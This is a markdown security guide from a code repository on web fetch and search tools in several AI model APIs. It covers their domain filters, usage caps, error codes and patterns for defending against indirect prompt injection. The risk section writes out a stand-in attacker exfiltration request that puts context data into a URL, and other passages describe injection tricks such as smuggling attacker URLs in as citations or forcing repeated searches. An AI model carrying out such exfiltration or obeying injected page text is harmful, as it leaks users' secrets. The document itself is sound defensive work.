SPB Git forge

spb/doc-api

Public
2commits 1branches 0releases
15.7 MBsize
maindefault branch
14 days agolast push
Python 88.3% TypeScript 7.6% Shell 4.1%
9.7 KB · 66 lines markdown
Rendered Raw Blame History
1# Web browsing, search and fetch tools23**Status:** DOCUMENTED (xAI `web_search` + `x_search` LIVE_VERIFIED 2026-09-19; Gemini `urlContext` LIVE_VERIFIED, `googleSearch` ACCOUNT_RESTRICTED on the free-tier key)4**Sources:** https://platform.claude.com/docs/en/agents-and-tools/tool-use/web-fetch-tool · …/web-search-tool · https://platform.claude.com/docs/en/manage-claude/api-and-data-retention · OpenAI OpenAPI spec (`web_search`) · https://developers.openai.com/api/docs/guides/tools-connectors-mcp#risks-and-safety · xAI: https://docs.x.ai/developers/tools/web-search (`allowed_domains`/`excluded_domains` ≤ 5 exclusive, `enable_image_understanding`, `enable_image_search`; sub-tools `web_search`, `browse_page`, `open_page`, `open_page_with_find`), https://docs.x.ai/developers/tools/x-search (`allowed_x_handles`/`excluded_x_handles`, `from_date`/`to_date`, `enable_video_understanding`), https://docs.x.ai/developers/tools/citations (`url_citation` annotations, inline `[[N]](url)`, `include:["no_inline_citations"]`), https://docs.x.ai/developers/pricing (per-call / per-post pricing) · Gemini: https://ai.google.dev/gemini-api/docs/google-search (`groundingMetadata`, **Search Suggestions display requirement**, redirect URIs), https://ai.google.dev/gemini-api/terms (grounded results: no caching/syndication/training; 30-day storage), https://ai.google.dev/gemini-api/docs/url-context (public URLs only, 20/request, 34 MB, `URL_RETRIEVAL_STATUS_UNSAFE`), https://ai.google.dev/gemini-api/docs/maps-grounding5**Last verified:** 2026-09-1967## The risk89A model that can **read** the web is exposed to indirect prompt injection; a model that can **request arbitrary URLs** can be turned into an exfiltration channel (`GET https://attacker/?secret=<data from your context>`). Anthropic's web-fetch docs say it directly: enabling web fetch "where Claude processes untrusted input alongside sensitive data poses data exfiltration risks. Only use this tool in trusted environments or when handling non-sensitive data."1011## Anthropic `web_fetch_*` — controls1213| Parameter / rule | Effect |14|---|---|15| **URL must already be in the conversation** | Claude can only fetch URLs that appeared in user messages, client-side tool results, or previous web search/fetch results — **never a URL it generated itself**. Violations return `url_not_in_prior_context`. This is the primary anti-exfiltration control; do not "help" the model by echoing its own URLs back in a tool result (that would launder them) |16| `allowed_domains` / `blocked_domains` | domain allow/deny lists (bare domains, optional path prefix) |17| `max_uses` | hard cap on fetches per request (`max_uses_exceeded`) — bounds cost and blast radius |18| `max_content_tokens` | truncates fetched content — bounds injection payload size and cost |19| `citations: {enabled: true}` | fetched text is cited; helps users verify where an answer came from |20| `use_cache: false` | bypass the fetch cache when freshness matters (default `true`) |21| Error codes | `invalid_input`, `url_too_long`, `url_not_allowed`, `url_not_accessible`, `unsupported_content_type`, `too_many_requests`, `max_uses_exceeded`, `unavailable`, `url_not_in_prior_context` — surface them, do not retry blindly |22| Versions | `web_fetch_20250910` … `web_fetch_20260318` (dynamic filtering runs code over the page before it enters context) — check `generated/tools.json` for the version your model supports |2324## Anthropic `web_search_*` — controls2526`allowed_domains` **xor** `blocked_domains` (sending both → 400), `max_uses`, `user_location` (avoid sending precise end-user location unless needed). Search results are third-party content: same injection caveats. Results come back as `web_search_tool_result` blocks with citations.2728## OpenAI `web_search` (hosted)2930`{"type":"web_search"}` (also `web_search_preview`, dated variants). Output items `web_search_call` + `output_text` annotations (`url_citation`). Filtering options are documented on the tool (see `docs/tools/` for the exact fields per version) — apply the same principles: restrict domains where the tool allows it, and never treat page text as instructions. OpenAI's hosted search runs outside your network, so **your** SSRF surface is nil, but the injection surface is the same.3132## xAI `web_search` and `x_search` (server-side, Responses API only)3334- **Exfiltration surface = the model's own queries and page opens.** The `web_search` sub-tools (`web_search`, `web_search_with_snippets`, `browse_page`, `open_page`, `open_page_with_find`) navigate to URLs the model chooses — there is **no** Anthropic-style "URL must already be in context" rule. Anything in the model's context (including secrets you pasted) can end up in a search query or a URL path. Restrict with `allowed_domains` (≤ 5, bare domains) or `excluded_domains`; bound the loop with `max_turns`; keep secrets out of requests that carry these tools.35- `x_search` reads X posts, profiles and threads (sub-tools `x_user_search`, `x_keyword_search`, `x_semantic_search`, `x_thread_fetch`) — social content is the classic indirect-injection vector; scope with `allowed_x_handles`/`excluded_x_handles` and a date range; `enable_video_understanding`/`enable_image_understanding` widen the surface to media.36- Output: `web_search_call {action: search | open_page | find_in_page, sources (with include)}`, `custom_tool_call` (x_search sub-tools), `url_citation` annotations plus inline `[[N]](url)` markdown by default — render citations as text, or disable inline links with `include:["no_inline_citations"]` so a model cannot smuggle an attacker URL into your UI as a "citation".37- Billing is per **successful** call ($5 per 1k; X search moves to per-post/per-profile pricing on 2026-09-21) — a prompt-injected "search 50 more times" is also a cost attack: `max_turns`.38- Not available on Chat Completions (422) — a Responses-only design keeps the browsing surface out of your plain chat endpoints.3940## Gemini `googleSearch`, `googleMaps` and `urlContext` (server-side)4142- **`googleSearch` has no domain filter** (only `timeRangeFilter`, `searchTypes.webSearch|imageSearch`); results arrive as `groundingMetadata.groundingChunks[].web{uri (Google redirect), title}` + `groundingSupports` — untrusted third-party text. Terms: you **must display the Search Suggestions widget** (`searchEntryPoint.renderedContent`) to the requesting user, may not cache/syndicate/train on grounded results, and grounding prompts/outputs are **stored 30 days and cannot be disabled** (no ZDR). Billed per search query on Gemini 3 ($14/1k after the free 5,000/month); free-tier keys get 429 `limit: 0` (ACCOUNT_RESTRICTED here).43- **`urlContext` fetches whatever URLs appear in the prompt** (≤ 20, 34 MB each) — an injected URL in user text *will* be retrieved; the only structural protections are Google's: public URLs only (no localhost/private/tunnel hosts → SSRF into your network is impossible from Google's side, but the model can still read attacker pages), content moderation (`URL_RETRIEVAL_STATUS_UNSAFE`), no nested links. Pre-filter prompts against your own allowlist; check `urlContextMetadata.urlMetadata[].urlRetrievalStatus`; note fetched content is billed as input tokens **even when retrieval fails** (`toolUsePromptTokenCount: 130` observed on an `ERROR`).44- `googleMaps` grounding: display obligations (sources immediately after grounded content, `googleMapsWidgetContextToken`) and user location (`toolConfig.retrievalConfig.latLng`) — send end-user coordinates only with consent.45- Combining `googleSearch` + `urlContext` ("search then read pages") + function calling (Gemini 3 tool combination) in one request gives the model read **and** act capabilities on untrusted pages — apply the "read-only second pass" pattern below.4647## Self-hosted browsing (your own `fetch` tool)4849If you implement fetching yourself (client tool, Anthropic `browser_toolset`, Playwright…), you inherit the full SSRF problem — see `file-uploads-and-ssrf.md`: resolve DNS and reject private/link-local/metadata ranges **after** redirects, allowlist schemes (`https` only), cap size and time, strip cookies/credentials, run in an egress-filtered network.5051## Patterns52531. **Read-only, tool-less second pass**: fetch with a request that has *only* the fetch tool; summarise; then run the request that has your sensitive tools using the summary, not the raw page.542. **Never combine** web fetch with tools that can send data out (email, HTTP POST, MCP write tools) in the same request when the input is untrusted.553. **Mark fetched content** in the transcript with its URL and timestamp; render links to users as text, not clickable auto-loaded content.564. **Budget**: `max_uses` + `max_content_tokens` + your `BudgetGuard` (`docs/architecture/resilience.md`).5758## Checklist5960- [ ] Web fetch/search only in requests without sensitive data or without exfiltration-capable tools (xAI/Gemini search tools can carry context into queries).61- [ ] Anthropic `allowed_domains`/`blocked_domains`, `max_uses`, `max_content_tokens`; xAI `allowed_domains`/`excluded_domains` (≤ 5) + `allowed_x_handles` + `max_turns`; Gemini: `urlContext` prompts pre-filtered, `googleSearch` accepted as unscoped or not enabled.62- [ ] Never echo model-generated URLs back into context (Anthropic rule); never paste model-generated URLs into a Gemini prompt with `urlContext` on.63- [ ] Tool error codes handled explicitly: Anthropic `url_not_in_prior_context`, Gemini `URL_RETRIEVAL_STATUS_UNSAFE|ERROR|PAYWALL`, xAI `web_search_call.status`.64- [ ] Citations enabled and shown to users as text (`url_citation` annotations; xAI inline `[[N]](url)` disabled or sanitised); Gemini Search Suggestions rendered as required by the terms.65- [ ] Self-hosted fetchers: SSRF controls, scheme allowlist, size/time caps, egress filtering.66